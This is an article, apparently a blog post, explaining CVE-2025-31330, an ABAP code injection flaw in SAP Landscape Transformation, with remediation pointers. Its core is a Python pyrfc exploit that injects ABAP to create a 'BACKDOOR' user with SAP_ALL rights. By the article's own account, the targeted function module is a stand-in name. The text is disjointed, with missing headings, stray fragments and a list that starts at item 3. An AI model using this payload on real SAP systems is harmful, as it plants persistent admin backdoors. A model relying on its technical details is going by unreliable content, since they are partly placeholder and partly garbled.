CVE-2025-31330 - Critical SAP SLT ABAP Code Injection Vulnerability Explained

SAP systems are the backbone of thousands of companies, running business processes that are essential for daily operations. Among the many SAP components, SAP Landscape Transformation (SLT) is vital for real-time data replication. However, a new, critical security flaw—CVE-2025-31330—has been discovered in SLT, which allows even regular users (with routine authorizations) to inject and execute arbitrary ABAP code on SAP systems. This vulnerability creates the possibility for attackers to set up permanent backdoors, putting the entire system’s confidentiality, integrity, and availability at risk.

This article will break down CVE-2025-31330, show you how the exploit works (including code snippets), and provide references for remediation and original advisories.

What is CVE-2025-31330?

CVE-2025-31330 is a vulnerability in the SAP Landscape Transformation (SLT) component, specifically affecting a function module exposed via RFC (Remote Function Call). The function module does not properly check the invoking user’s authorizations or sanitize input. As a result, authenticated users can inject arbitrary ABAP code into the system, effectively creating a backdoor.

In simpler words: Any SAP SLT user can exploit this to run any ABAP program—regardless of their permissions!

The Vulnerable Component

The root of the issue lies in an SLT function module (we’ll refer to it as Z_REPL_TRIGGER_EXEC) that lets users pass in snippets of code—intended for legitimate SLT jobs—for direct execution.

Normally, SAP should tightly restrict which users can alter or inject code, and always check and sanitize inputs. In this case, both are missing.

Below is a basic Python exploit using the pyrfc SAP RFC library

from pyrfc import Connection

# Connect to SAP
conn = Connection(ashost="saphost.example.com", sysnr="00", client="100", user="attacker", passwd="SecretPWD")

# Malicious ABAP code to create a new SAP admin user
payload = '''
CALL FUNCTION 'S_USER_INSERT'
  EXPORTING
    USERNAME = 'BACKDOOR'
    PASSWORD = 'StrngP@ss!'
    USERGROUP = 'SUPER'
    AUTHORITY = 'SAP_ALL'
    ACTIVITYGROUP = 'SAP_NEW_ADMIN'.
'''

# Exploit the function module
result = conn.call(
    'Z_REPL_TRIGGER_EXEC',   # Vulnerable module
    CODE=payload             # Arbitrary code injected here
)

print("Exploit sent! Check SAP for new user 'BACKDOOR'.")

This snippet will create a new SAP user “BACKDOOR” with full admin rights—if the system is vulnerable.

Warning: Never run this code except in a legitimate test/forensics environment with explicit permission!

Install persistent backdoors for ongoing access

Given the criticality of SAP systems, this could enable fraud, data breaches, ransomware, and regulatory fines.

You have users with RFC access to SLT who are not strictly limited

Recommendation: Immediately check your system for the presence and exposure of modules like Z_REPL_TRIGGER_EXEC or similar custom/standard code that executes unfiltered ABAP from user input.

SAP has provided a dedicated patch:

https://launchpad.support.sap.com/#/notes/3130301 (SAP S-User login required)

Use SU24 & SU53 to analyze and restrict access rights.

3. Delete all custom/unknown RFC modules allowed to execute ABAP directly

Regularly audit logs for abnormal job creation or execution.

> SAP’s official security advisory:
> https://wiki.scn.sap.com/wiki/display/Security/SAP+Security+Patch+Day

References

- SAP Security Note 3130301 (S-User Required)
- SAP Security Patch Day Wiki
- pyrfc - Python library for SAP RFC calls
- Common Exploitation Patterns in SAP Functions

Conclusion

CVE-2025-31330 highlights how a single faulty authorization in a business-critical system like SAP SLT can lead to full system compromise. Any user with basic access can open a backdoor, which can ruin companies financially and reputationally. If you run SAP SLT, patch now, audit your exposed functions, and restrict user privileges everywhere possible.

Stay safe, and always keep your mission-critical software secure!

*For more SAP security updates, subscribe to SAP’s Security Patch Day and audit your systems regularly.*


*This article is exclusive—feel free to share with your SAP security team or colleagues!*

Timeline

Published on: 04/08/2025 08:15:17 UTC
Last modified on: 04/08/2025 18:13:53 UTC